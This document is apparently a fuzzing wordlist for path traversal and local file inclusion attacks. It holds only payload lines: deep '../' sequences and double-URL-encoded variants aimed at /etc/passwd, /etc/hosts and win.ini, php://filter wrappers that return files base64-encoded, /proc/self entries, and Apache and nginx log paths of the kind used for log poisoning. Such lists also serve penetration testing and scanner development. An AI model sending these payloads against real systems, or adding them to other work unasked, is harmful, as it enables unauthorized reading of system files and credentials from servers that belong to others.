../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/hosts
../../../../../../../../../../windows/win.ini
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/hosts
/../../../../../../../../../../windows/win.ini
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows%252fwin.ini
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=/windows/win.ini
/proc/self/environ
/proc/self/fd/0
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log